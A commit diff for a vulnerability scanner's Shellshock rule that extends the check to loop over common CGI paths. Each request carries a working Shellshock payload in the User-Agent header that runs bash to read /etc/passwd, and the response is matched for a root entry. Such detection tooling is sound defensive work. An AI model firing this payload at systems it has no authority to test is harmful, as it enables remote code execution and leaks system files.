add more cgi paths

PaytmLabs · Sep 29, 2020 · 9a3b351 · 9a3b351
1 parent 30866a2
commit 9a3b351
Showing 1 changed file with 25 additions and 20 deletions.
diff --git a/rules/vulnerabilities/rule_shellshock.py b/rules/vulnerabilities/rule_shellshock.py
@@ -3,6 +3,7 @@
 from core.redis import rds
 from core.triage import Triage
 from core.parser import ScanParser, ConfParser
+from db.db_paths import COMMON_CGI_PATHS
 
 class Rule:
   def __init__(self):
@@ -25,25 +26,29 @@ def check_rule(self, ip, port, values, conf):
     if 'http' not in module:
       return
 
-    resp = t.http_request(ip, port, uri='/cgi-bin/status', headers={'User-Agent':"() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"})
-
-    if not resp:
-      return
-
-    if re.search('root:[x*]:0:0', resp.text):
-      self.rule_details = 'Remote Code Execution Shellshock'
-      js_data = {
-        'ip': ip,
-        'port': port,
-        'domain': domain,
-        'rule_id': self.rule,
-        'rule_sev': self.rule_severity,
-        'rule_desc': self.rule_description,
-        'rule_confirm': self.rule_confirm,
-        'rule_details': self.rule_details,
-        'rule_mitigation': self.rule_mitigation
-      }
-
-      rds.store_vuln(js_data)
+    for uri in COMMON_CGI_PATHS:
+
+      resp = t.http_request(ip, port, uri=uri, headers={'User-Agent':"() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"})
+
+      if not resp:
+        continue
+
+
+      if resp and re.search('root:[x*]:0:0', resp.text):
+        self.rule_details = 'Remote Code Execution Shellshock'
+        js_data = {
+          'ip': ip,
+          'port': port,
+          'domain': domain,
+          'rule_id': self.rule,
+          'rule_sev': self.rule_severity,
+          'rule_desc': self.rule_description,
+          'rule_confirm': self.rule_confirm,
+          'rule_details': self.rule_details,
+          'rule_mitigation': self.rule_mitigation
+        }
+
+        rds.store_vuln(js_data)
+        break
 
     return